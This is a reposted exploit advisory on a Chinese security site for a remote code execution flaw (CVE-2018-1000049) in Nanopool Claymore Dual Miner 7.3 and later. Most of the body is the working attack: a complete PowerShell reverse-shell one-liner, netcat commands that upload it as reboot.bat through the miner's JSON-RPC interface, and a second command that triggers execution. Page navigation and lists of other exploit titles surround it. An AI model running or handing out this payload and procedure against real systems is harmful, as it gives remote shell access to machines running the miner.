首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Nanopool Claymore Dual Miner 7.3 - Remote Code Execution
来源:vfocus.net 作者:ReverseBrain 发布时间:2018-05-18  
# Exploit Title: Nanopool Claymore Dual Miner >= 7.3 Remote Code Execution
# Date: 2018/02/09
# Exploit Author: ReverseBrain
# Vendor Homepage: https://nanopool.org/
# Software Link: https://github.com/nanopool/Claymore-Dual-Miner
# Version: 7.3 and later
# Tested on: Windows, Linux
# CVE : 2018-1000049
 
Suppose the miner is running on localhost on port 3333. First of all you need to convert a .bat string into hexadecimal format, for example, this one uses powershell to spawn a reverse shell on localhost listening on port 1234:
 
powershell.exe -Command "$client = New-Object System.Net.Sockets.TCPClient('127.0.0.1',1234);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
 
Convert it into hexadecimal and paste it on the second parameter inside this string:
 
echo '{"id":0,"jsonrpc":"2.0","method":"miner_file","params":["reboot.bat","HEX_STRING"]}' | nc 127.0.0.1 3333 -v
 
Then, to trigger the vulnerability just send {"id":0,"jsonrpc":"2.0","method":"miner_reboot"}
string to the miner.
 
echo '{"id":0,"jsonrpc":"2.0","method":"miner_reboot"}' | nc 127.0.0.1 3333 -v
 
You got the shell!
 
This exploit works also on Linux, just substitute reboot.bat with reboot.bash or reboot.sh.
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Intelbras NCLOUD 300 1.0 - Aut
·Linux < 4.16.9 / < 4.14.41 - 4
·Inteno IOPSYS 2.0 < 4.2.0 - 'p
·Jenkins CLI - HTTP Java Deseri
·WhatsApp 2.18.31 iOS Memory Co
·Apache Struts 2 - Struts 1 Plu
·2345 Security Guard 3.7 - '234
·AF_PACKET packet_set_ring Priv
·Libuser roothelper Privilege E
·HPE iMC 7.3 - Remote Code Exec
·Microsoft Windows 2003 SP2 - '
·Prime95 29.4b8 - Stack Buffer
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved